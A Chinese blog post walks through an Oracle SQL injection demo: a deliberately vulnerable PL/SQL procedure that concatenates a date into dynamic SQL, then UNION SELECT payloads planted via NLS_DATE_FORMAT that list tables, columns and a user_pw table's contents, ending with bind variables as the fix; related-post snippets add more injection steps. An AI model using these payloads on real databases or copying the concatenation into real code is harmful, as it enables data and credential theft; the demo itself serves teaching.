oracle在线注入测试,oracle sql注入测试

最新推荐文章于 2024-05-20 21:14:17 发布
最新推荐文章于 2024-05-20 21:14:17 发布
阅读量221 收藏
点赞数
文章标签: oracle在线注入测试

这两天看看了TOM大师的书,一开始就讲到了sql注入,对于我们这种“邪恶”的程序员当然要研究研究,所以记录了模拟的过程。也通过模拟的过程了解了什么是SQL注入。

1,创建过程

在test用户下

create or replace procedure inject(var_date in date)

--AUTHID CURRENT_USER  如果添加上这个关键词,也可以减少sql注入问题,不过这个对调用用户的权限必须仔细,否则会出现权限问题。

is

/*

功能:测试SQL注入攻击

时间:2012-08-07

*/

v_rec all_users%rowtype;

v_course sys_refcursor;

v_query long;

begin

v_query:='select * from all_users where created='''||var_date||'''';--这一步就是“罪魁祸首”了

dbms_output.put_line(v_query);

open v_course for v_query;

for i in 1..100 loop

fetch v_course into v_rec;

exit when v_course%notfound;

dbms_output.put_line(v_rec.username||'.......');

end loop;

null;

close v_course;

end inject;

2,授权给scott用户执行

SQL> grant execute on test.inject to scott;

3,邪恶的程序员(scott)对过程进行分析,找到弱点,及''空可以为时间并对sql进行拼接

SQL> set serveroutput on   这一步为在sqlplus下显示dbms_output的结果

SQL> alter session set nls_date_format ='"''union select tname,0,null from tab--"';

SQL> exec test.inject(sysdate);

select * from all_users where created=''union select tname,0,null from tab--'

ADD_YEARPLAN.......

BIG_TABLE.......

CLASS.......

CLASS_COURSE.......

CLASS_PROCESS.......

COURSE.......

RUN_STATS.......

STATS.......

STATUS.......

STUDENT.......

STUDENT_COURSE.......

T1.......

T2.......

TEACHER.......

TEST.......

TEST_A.......

USER_PW.......

YEARPLAN_PROCESS.......

YEAR_PLAN.......

这其中包括了scott用户下的表和test用户下的表,这样你就可以通过你的才智找到test下的表,但是你没有权限查看,也不知道表中具体的列名。所以还得继续修改时间格式和执行那个存储过程。

SQL> alter session set nls_date_format ='"''union select tname||cname,0,null from col--"';

Session altered

SQL>  exec test.inject(sysdate);

select * from all_users where created=''union select tname||cname,0,null from col--'

ADD_YEARPLANADDCONTENT.......

ADD_YEARPLANADDDATE.......

ADD_YEARPLANADDREASON.......

ADD_YEARPLANADDYEARPLAN_ID.......等等

这样就知道具体的列名了,要想获得列的值还的在这样来一次

SQL> alter session set nls_date_format ='"''union select uname,0,null from user_pw--"';

Session altered

SQL>  exec test.inject(sysdate);

select * from all_users where created=''union select uname,0,null from user_pw--'

xionglang.......

这样就知道列中具体的内容了。呵呵,如果有什么password的啊!那你就赚到了。。。。

要解决这样的问题,TOM大师也说了,直接用绑定变量就可以有效的避免了。

zy ch
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracle 在线练习平台
qq_61604164的博客
08-05 3594
Oracle练习平台
Web安全 SQL注入漏洞测试
qq_73710216的博客
04-23 849
SQL注入就是 有些恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容中,同时程序的本身对用户输入的内容过于相信,没有对用户插入的SQL语句进行任何的过滤,从而直接被SQL语句直接被服务端执行,导致数据库的原有信息泄露,篡改,甚至被删除等风险。第一步:进入可能存在SQL注入的页面,先把前面的语句闭合,再使用 order by 测试字段数有多少.(如果指定的列不存在,数据库会报错,通过报错判断查询结果的列数,从而确定主查询的字段数.)(再使用 # 注释掉后面的)
oracle:sql注入
最新发布
kzr380203739的专栏
05-20 49
3、cookie注入注入字段在cookie数据中,网站使用通用的防注入程序,会对get、post提交的数据进行过滤,缺往往遗漏对cookie中的数据进行过滤。4、其他注入:http请求的其他内容出发的SQL注入漏洞,如user-agent、referer、x-forwarded-for(xff,)等。xff代表客户端“真实的IP地址”,xff注入注入点位置在头部的xff头的位置。5、二次注入注入位置在引用我们提前插入的恶意字段。2、post注入注入字段在PAST提交的数据中。
oracle语法测试在线,oracle10g_rman_语法测试_3
weixin_28883533的博客
04-16 437
--恢复数据文件2的块12,13,你可以指定多少数据文件BLOCKRECOVER DATAFILE 2 BLOCK 12, 13 DATAFILE 3 BLOCK 5, 98, 99 DATAFILE 4 BLOCK 19;---恢复数据文件多个块,表空间多个块(tablespace多个块,以dba为标记)RUN{BLOCKRECOVER DATAFILE 3 BLOCK 2,3,4,5 TABL...
在线oracle sql测试,Oracle SQL测试
weixin_30234101的博客
04-11 895
Oracle SQL测试2cid Region(区域) Saler (销售员) Money(合同金额 )1 北京 杨建 1002 上海 社长 2003 杭州 副团 5004 上海 ...
oracle 语句 在线测试,Oracle_PLSQL测试题与答案(绝对经典)
weixin_35140642的博客
04-03 1728
oracle 经典 练习Oracle PL/SQL测试题姓名:___ _________一、选择题1、Oracle数据库中为新创建的表分配的初始空间通常为多大(B)A、一个块B、一个区C、一个段D、c一个表空间2、关于存储过程参数,正确的说法是(B)A、存储过程的输出参数可以是标量类型,也可以是表类型B、存储过程输入参数可以不输入信息而调用过程C、可以指定字符参数的字符长度(函数的()或者过程的...
Oracle数据库SQL注入手册1
08-08
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’
SQL注入测试
01-05
SQL注入测试是网络安全领域中的一个重要话题,主要针对的是基于Web的应用程序中存在的一种常见安全漏洞。当应用程序在处理用户输入时没有充分验证和过滤数据,攻击者可以通过输入恶意的SQL语句来操纵数据库,获取...
Oracle也有注入漏洞
12-16
"Oracle也有注入漏洞"这个话题揭示了即便是在强大的Oracle系统中,也可能存在SQL注入问题,这是一类严重的网络安全威胁。 SQL注入是一种攻击手段,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,以获取、...
pangolinsdl—sql注入工具
06-20
针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和防御。PangolinsDL就是这样一个工具,它以其简洁的界面和易用性受到了许多用户的青睐。 1. **PangolinsDL概述** PangolinsDL是一款强大的SQL...
Oracle开发人员SQL注入攻击入门
10-11
Oracle开发人员SQL注入攻击入门》 SQL注入是一种常见的网络安全攻击方式,主要针对使用SQL(结构化查询语言)的数据库系统,如Oracle。攻击者通过在应用的输入字段中插入恶意SQL代码,来欺骗服务器执行非预期的...
cookie在线注入工具
05-22
cookie在线注入工具cookie在线注入工具
Oracle数据库SQL注入攻击的检测与防御
03-01
论文介绍了SQL注人攻击及其常用的攻击技术,给出了在Oracle数据库中对SQL注人攻击的检测方法与 防御措施,文中的检测方法和预防措施可以应用到任意的数据库系统中。
数据库在线测试
林鹏
04-23 2055
SQL手工注入漏洞测试(Oracle数据库)
weixin_52374319的博客
05-15 1050
SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn) 0x02 判断注入点 跟其他数据库一样,检测注入点都是可以通过拼接and语句进行判断。这里通过and 1=1 和and 1=2进行判断。实战中还可以通过延时函数进行判断。 http://124.70.71.251:44530/new_list.php?id=1%2
oracle测试数据库搭建
zgl、荒的博客
09-17 3645
系统参数 主机:testdb    IP:192.168.2.1 选择备份:/backup/databk/full* 目的:检测EMR数据库rman备份是否有效   恢复步骤 删除测试库上的oracle实例 关闭testdb上的旧数据库,删除与其相关的测试库数据 删除之前的实例his,确保恢复时不会发生冲突。       从生产环境把备份拷贝到测试环境 在生成环境上拷贝所有的备份...
mysql注入在线测试_可能是网上最易懂的SQL手工注入教程
weixin_29150195的博客
01-19 291
我是技术不高,但我能带你入门我遇到过无数人曾来像我表示自己想学网络安全,走了很多弯路,求师被骗过很多钱。这样的人我没办法帮助太多,限于时间精力与能力,帮得了1个帮不了100个,再说我也不是昔日的雷锋了。如今我也基本上不做渗透了,回过头看到几年前自己笔记中有一些注入笔记,虽然我没有大牛水平,没有高端操作,但我希望我能把我仅有的一些技术与资源,能够最大程度惠及到网络安全向往者身上,能够带领一部分新人步...
在线靶场-墨者-SQL注入1星-SQL手工注入漏洞测试(MySQL数据库)
weixin_42079912的博客
07-18 2584
尝试在URL后,输入and 1=1显示正常,and 1=2显示不正常,判断此处存在SQL注入 order by 获取字段数为4 and 1=2 union select 1,2,3,4 发现2在原文Title处,3在content处 and 1=2 union select 1,version(),database(),4 爆库得到 and 1=2 union select 1,ve...
mysql注入在线测试_记一次SQL注入实战
weixin_31207855的博客
01-28 517
作者:左昱_leftshine刚发现漏洞时,我就已经成功实现了注入,因为怕发到网上后被玩坏,一直没有发布。今天去看了看,原网页已经无法访问了,现在发出来应该就没有什么大问题了。本文仅供学习交流,目的是为了构建更加安全的网络环境!注入地址某VIP会员专用系统相关工具注入工具:超级SQL注入工具【SSQLInjection】 明小子抓包工具:Wireshark注入过程1.测试漏洞1)测试 ’首先打...
oracle sql注入
08-22
SQL注入是一种常见的网络安全漏洞,可用于攻击数据库应用程序。它利用不正确的输入验证或不安全的查询构造,使攻击者能够执行恶意SQL语句。 为了防止SQL注入攻击,以下是一些常见的防御措施: 1. 参数化查询:使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值